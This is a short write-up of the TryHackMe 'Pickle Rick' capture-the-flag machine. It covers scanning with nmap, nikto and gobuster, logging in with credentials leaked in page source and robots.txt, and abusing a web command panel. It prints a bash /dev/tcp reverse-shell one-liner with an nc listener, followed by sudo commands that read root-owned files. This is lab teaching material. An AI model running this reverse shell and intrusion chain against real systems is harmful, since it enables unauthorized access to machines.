“The only true wisdom is in knowing you know nothing.” - Socrates

Pickle Rick – Easy

In this post, we’ll cover another CTF machine made by TryHackme.

Enumeration

				
    # Service/version detection with the default NSE scripts
    nmap -sC -sV {ipaddress}

    # Web server misconfiguration and known-file scan
    nikto -host {ipaddress}

    # Directory brute force (gobuster takes "dir" as a subcommand, not "-dir")
    gobuster dir -u http://{ipaddress} -w /usr/share/wordlists/dirb/common.txt

The results of the nmap scan showed that there are only two ports open, 22 and 80. As soon as the nmap scan was finished, I ran nikto and gobuster scans against the host.

Meanwhile, I browsed the web application looking for any disclosed information or hints.
Viewing the page source, I found the username “R1ckRul3s” in an HTML comment on the home page.

Additionally, the contents of “robots.txt” were unusual.

Using the username “R1ckRul3s” and the contents of “robots.txt” as the password, I was able to log in to the application.

Exploitation

Once logged in, we are presented with a Command Panel that runs system commands on the server. Running “ls -al” shows two files, “Sup3rwhatever.txt” and “clue.txt”.

Let’s read the contents of both the files:

				
    less Sup3rwhatever.txt

    less clue.txt

Looking around the file system, I found another file named “second ingredients” inside rick’s home directory.

I used the following commands to get a reverse shell and then read the 3rd flag.

				
    # On the attacking machine, start a listener before triggering the callback
    nc -lvnp 4050

    # Run from the Command Panel: bash opens a TCP socket to the attacking
    # machine (use your own IP here, not the target's), sends stdout and
    # stderr to it (>&) and reads stdin back from it (0>&1)
    bash -c 'bash -i >& /dev/tcp/{attacker-ip}/4050 0>&1'

    # List what the user can run with sudo
    sudo -l

    # List the contents of the "/root" directory
    sudo ls -al /root

    # Get the 3rd flag value
    sudo less /root/3rd.txt

Thank you for reading and stay tuned for new write-ups.

Happy Hunting!

Posted by: infinity
